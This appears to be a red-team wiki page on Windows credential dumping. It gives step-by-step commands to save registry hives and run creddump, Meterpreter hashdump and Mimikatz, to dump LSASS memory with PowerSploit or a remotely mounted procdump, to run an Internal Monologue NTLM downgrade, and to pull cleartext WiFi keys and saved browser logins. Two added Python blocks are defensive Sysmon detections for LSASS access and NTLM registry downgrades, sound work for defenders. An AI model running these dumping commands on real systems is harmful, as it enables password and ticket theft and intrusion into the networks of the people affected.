## CREDDUMP
https://github.com/Neohapsis/creddump7
Use 'creddump' on the saved SYSTEM and SECURITY hives (and the SAM hive for pwdump) to
extract any possible cached domain credentials. Three modes of attack: cachedump, lsadump, pwdump.
Manually save the Windows XP/Vista/7 registry hives using 'reg.exe':
```
C:\WINDOWS\system32>reg.exe save HKLM\SAM sam_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\SECURITY sec_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\system sys_backup.hiv
```
## CACHEDUMP:
Run creddump tool against the saved hive files
```
cachedump.py <system hive> <security hive> <Vista/7=true/XP=false>:
(Vista/7) cachedump.py sys_backup.hiv sec_backup.hiv true
(XP) cachedump.py sys_backup.hiv sec_backup.hiv false
```
## LSADUMP:
Run lsadump tool against the saved hive files
```
lsadump.py <system hive> <security hive> <Vista/7=true/XP=false>:
(Vista/7) lsadump.py sys_backup.hiv sec_backup.hiv true
(XP) lsadump.py sys_backup.hiv sec_backup.hiv false
```
## PWDUMP:
Run pwdump tool against the saved hive files
```
pwdump.py <system hive> <sam hive> <Vista/7=true/XP=false>:
(Vista/7) pwdump.py sys_backup.hiv sam_backup.hiv true
(XP) pwdump.py sys_backup.hiv sam_backup.hiv false
```
## METERPRETER
Post exploitation dump local SAM database:
```
meterpreter> run post/windows/gather/hashdump
```
## [[MIMIKATZ]]
https://github.com/gentilkiwi/mimikatz
https://github.com/gentilkiwi/mimikatz/wiki
Post exploitation commands must be executed from admin or SYSTEM level
privileges. Command structure: modulename::commandname arguments
STEP 1: Start logging output of mimikatz. Defaults to Mimikatz.log
```
mimikatz # log
```
STEP 2: Enable debug privileges for processes
```
mimikatz # privilege::debug
```
STEP 3: Dump in-memory logon passwords
```
mimikatz # sekurlsa::logonpasswords full
```
STEP 4: Dump any Kerberos tickets stored
```
mimikatz # sekurlsa::tickets /export
```
You can elevate privileges in order to run certain modules:
```
mimikatz # token::whoami
mimikatz # token::elevate
```
## OFFLINE MIMIKATZ ATTACKS
## WINDOWS LSASS MEMORY DUMP
You can memory dump the LSASS process using Out-Minidump.ps1 from PowerSploit
and extract the plaintext passwords offline with Mimikatz.
https://github.com/PowerShellMafia/PowerSploit
https://astr0baby.wordpress.com/2019/01/21/andrewspecial-stealthy-lsass-exememory-dumping/
STEP 1: Copy PowerSploit into the user module path
"$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" on target, then
import it:
```
PS C:\>Import-Module PowerSploit
```
STEP 2: Dump the LSASS process memory with Out-Minidump in PowerSploit:
```
PS C:\>Get-Process lsass | Out-Minidump
```
STEP 3: Copy the output memory dump file (Example lsass_385.dmp) to your attack
workstation and run mimikatz against minidump dump file:
```
./mimikatz "sekurlsa::minidump lsass_385.dmp"
```
STEP 4: Now in MINIDUMP extract the plaintext passwords:
```
mimikatz # sekurlsa::logonpasswords
```
## WINDOWS REGISTRY HASH EXTRACTION
Save the Windows SYSTEM, SAM and SECURITY registry hives in order to extract passwords.
Save Windows XP/Vista/7 registry hives:
```
C:\WINDOWS\system32>reg.exe save HKLM\SAM C:\temp\sam_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\SECURITY C:\temp\sec_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv
```
STEP 1: Save registry hive using the above reg.exe into C:\temp
STEP 2: Copy saved registry hive files to local attack workstation.
STEP 3: Execute mimikatz against SYSTEM and SAM hive to extract passwords:
```
mimikatz # lsadump::sam /system:sys_backup.hiv /sam:sam_backup.hiv
```
## MIMIKATZ DPAPI
You can abuse the Windows DPAPI functionality to encrypt and decrypt data such
as browser locally stored cookies/logins, credential managers, and .rdg RDP
files. This technique is very complex. I encourage you to read the below
references to have a better understanding of this attack vector.
REFERENCES:
https://github.com/gentilkiwi/mimikatz/wiki/module---dpapi
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-userdpapi-abuse/
https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf
https://github.com/dfirfpi/dpapilab
https://bitbucket.org/jmichel/dpapick
## INTERNAL MONOLOGUE LOCAL ATTACK NTLMv1/NTLMv2
On targets where Mimikatz is not suitable to use due to AV or EDR solutions, you
can perform an Internal Monologue Attack. This attack invokes a local procedure
call to the NTLM authentication package (MSV1_0) from a user-mode application
through SSPI to calculate a NetNTLM response in the context of the logged-on
user, after performing an extended NetNTLM downgrade to a NetNTLMv1 hash.
https://github.com/eladshamir/Internal-Monologue
https://crack.sh/netntlm/
The Internal Monologue Attack flow is described below:
1-Disable NetNTLMv1 preventive controls by changing LMCompatibilityLevel,
NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as
described above.
2-Retrieve all non-network logon tokens from currently running processes and
impersonate the associated users.
3-For each impersonated user, interact with NTLM SSP locally to elicit a
NetNTLMv1 response to the chosen challenge in the security context of the
impersonated user.
4-Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and
RestrictSendingNTLMTraffic.
5-Crack the NTLM hash of the captured response.
6-Pass the Hash.
STEP 1: Build/Compile the DLL or EXE for InternalMonologue.
STEP 2: On target execute DLL/EXE with the follow options:
```
InternalMonologue -Downgrade True -Restore True -Impersonate True
```
AVAILABLE OPTIONS
```
Downgrade = specifies NTLMv1 downgrade change !Registry Modification!
Restore = restore original registry mods if downgraded
Impersonate = impersonate ALL available users
Verbose = print verbose output
Challenge = optional custom 8-byte NTLM challenge. Default=1122334455667788
```
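The downgrade step rewrites three LSA registry values and the Restore option puts them back, so a point-in-time registry audit may see nothing; the value-set events are what remain. As an added detection example (not part of the original page or the Internal-Monologue project), this Python triage flags Sysmon Event ID 13 writes to those three values and says whether the written value is weak or a restore; the key paths, Sysmon's "DWORD (0x…)" detail format, the tool path and the sample records are assumptions/constructed data.

```python
import re

# Registry values the downgrade step touches. Key paths are the standard LSA locations
# (an assumption here); compared lower-case because registry paths are case-insensitive.
LSA = r"hklm\system\currentcontrolset\control\lsa"
WATCHED = {  # value path -> (True when the written value is weak, why it matters)
    LSA + r"\lmcompatibilitylevel": (lambda v: v < 3, "client may send LM/NTLMv1 responses"),
    LSA + r"\msv1_0\ntlmminclientsec": (lambda v: not v & 0x80000, "NTLMv2 session security not required"),
    LSA + r"\msv1_0\restrictsendingntlmtraffic": (lambda v: v != 2, "outgoing NTLM traffic not denied"),
}
DWORD = re.compile(r"DWORD \((0x[0-9a-f]+)\)", re.I)  # Sysmon Details format for REG_DWORD (assumption)

def reg_event(image, value_path, dword):
    """Build a constructed Sysmon Event ID 13 (value set) record; sample data, not real telemetry."""
    return {"EventID": "13", "Image": image, "TargetObject": value_path, "Details": f"DWORD (0x{dword:08X})"}

TOOL = r"C:\Users\alice\InternalMonologue.exe"  # hypothetical path
SAMPLE_EVENTS = [
    reg_event(TOOL, r"HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel", 2),
    reg_event(TOOL, r"HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0\NtlmMinClientSec", 0x20000000),
    reg_event(TOOL, r"HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0\RestrictSendingNTLMTraffic", 0),
    # Restore writes the hardened value back, so only the event stream shows the downgrade happened
    reg_event(TOOL, r"HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel", 5),
    reg_event(r"C:\Windows\system32\svchost.exe", r"HKLM\SOFTWARE\Example\Unrelated", 1),
]

def classify(ev):
    """Return (value name, new value, verdict) for a write to a watched value, else None."""
    if ev.get("EventID") != "13":
        return None
    path = ev.get("TargetObject", "")
    if path.lower() not in WATCHED:
        return None
    m = DWORD.search(ev.get("Details", ""))
    if not m:
        return None  # non-DWORD data: still worth logging in production, skipped here
    value = int(m.group(1), 16)
    weak, reason = WATCHED[path.lower()]
    verdict = reason if weak(value) else "hardened value written (possible restore after downgrade)"
    return path.rsplit("\\", 1)[-1], value, verdict

def triage(events):
    """List (writing image, value name, new value, verdict) for every write to a watched NTLM setting."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result:
            hits.append((ev.get("Image", "?"),) + result)
    return hits
```

A downgrade followed shortly by a restore from the same image, as in the sample, is the sequence worth alerting on rather than either write alone.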
## REMOTELY MOUNT SYSINTERNALS DUMP LSASS
SCENARIO: You have gained admin access to a target system but do not want to put
the sysinternals tools on disk. You can map the live hosted version of
sysinternals and dump lsass process to extract hashes offline with mimikatz.
!!Caveat: Port 445 outbound must be allowed out of the network to the internet.
STEP 1: On target execute 'net use' to map the live version of sysinternals:
```
net use Z: \\live.sysinternals.com\tools\ "/user:"
```
STEP 2: Use 'procdump' to dump memory for the lsass process:
```
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```
STEP 3: Copy the output memory dump file to your attack workstation and run
mimikatz minidump against dump file:
```
mimikatz # sekurlsa::minidump lsass.dmp
```
STEP 4: Now in MINIDUMP extract the plaintext passwords:
```
mimikatz # sekurlsa::logonpasswords
```
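Both LSASS dump methods on this page (Out-Minidump above and procdump here) must open lsass.exe with at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ, which Sysmon records as Event ID 10. As an added detection example (not from the original page or any of the tools it lists), this Python triage applies that access-mask check over constructed Sysmon-style records; the allowlist of benign source images is an assumption to tune per estate.

```python
PROCESS_VM_READ = 0x0010            # needed to read memory out of lsass
PROCESS_QUERY_INFORMATION = 0x0400  # MiniDumpWriteDump asks for this as well
DUMP_MASK = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Source images that routinely open lsass.exe on a healthy host. Assumption: tune to your estate.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample records in a Sysmon-like key=value style; not real telemetry.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Temp\procdump.exe TargetImage=C:\Windows\system32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetImage=C:\Windows\system32\lsass.exe GrantedAccess=0x1410",
    r"EventID=10 SourceImage=C:\Windows\system32\csrss.exe TargetImage=C:\Windows\system32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\system32\wbem\WmiPrvSE.exe TargetImage=C:\Windows\system32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Temp\procdump.exe TargetImage=C:\Windows\system32\notepad.exe GrantedAccess=0x1FFFFF",
    r"EventID=1 Image=C:\Windows\system32\cmd.exe CommandLine=cmd.exe",
]

def parse_event(line: str) -> dict:
    """Split a one-line key=value record into a dict (sample values contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())

def is_lsass_dump_access(ev: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with the rights a minidump needs."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(ev.get("GrantedAccess", "0"), 16)
    if granted & DUMP_MASK != DUMP_MASK:
        return False  # e.g. 0x1000 QUERY_LIMITED_INFORMATION cannot read memory
    return ev.get("SourceImage", "").lower() not in BENIGN_SOURCES

def triage(lines) -> list:
    """Return (source image, granted access mask) for every suspicious lsass open."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_lsass_dump_access(ev):
            hits.append((ev["SourceImage"], int(ev["GrantedAccess"], 16)))
    return hits

if __name__ == "__main__":
    for src, mask in triage(SAMPLE_EVENTS):
        print(f"lsass opened with 0x{mask:X} by {src}")
```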
## DUMP STORED CLEARTEXT WIFI PASSWORD
https://github.com/jcwalker/WiFiProfileManagement
STEP 1: Git clone WiFiProfileManagement
STEP 2: Drop the root folder in your PSModulePath, remove the branch name (ex.
dev) from the folder name, and PowerShell should find the module.
STEP 3: Use 'Get-WiFiProfile' to dump the clear text password:
```
PS C:\>Get-WiFiProfile -ProfileName TestWiFi -ClearKey
```
## SHARPWEB DUMP BROWSER CREDENTIALS
https://github.com/djhohnstein/SharpWeb
Usage:
```
.\SharpWeb.exe arg0 [arg1 arg2 ...]
Arguments:
  all     - Retrieve all Chrome, FireFox and IE/Edge credentials.
  full    - The same as 'all'
  chrome  - Fetch saved Chrome logins.
  firefox - Fetch saved FireFox logins.
  edge    - Fetch saved Internet Explorer/Microsoft Edge logins.
Example:
  SharpWeb.exe chrome firefox
```
## POPULAR WINDOWS APPLICATIONS PASSWORD LOCATIONS
SecurityXploded online resource for Windows applications password storage.
https://securityxploded.com/passwordsecrets.php
Internet Browsers: Avant, Comodo Dragon, CoolNovo, Firefox, Flock, Google Chrome,
Google Chrome Canary, Internet Explorer, Maxthon, Opera, Safari, SeaMonkey
FTP Clients: Dreamweaver, FileZilla, FlashFXP, FTPCommander, SmartFTP, WS_FTP
Instant Messengers: AIM (AOL IM), Beyluxe Messenger, BigAnt Messenger, Camfrog Video
Messenger, Digsby IM, Google Talk (GTalk), IMVU Messenger, Meebo Notifier, Miranda,
MSN Messenger, MySpaceIM, Nimbuzz Messenger, PaltalkScene, Pidgin (formerly Gaim),
Skype, Tencent QQ, Trillian, Windows Live Messenger, XFire, Yahoo Messenger
Email Clients: Foxmail, Gmail Notifier, IncrediMail, Microsoft Outlook, Thunderbird,
Windows Live Mail
Misc Applications: Google Desktop Search, Heroes of Newerth, Internet Download Manager,
JDownloader, Orbit Downloader, Picasa, Remote Desktop, Seesmic, SuperPutty, TweetDeck
[[Home]]
#howto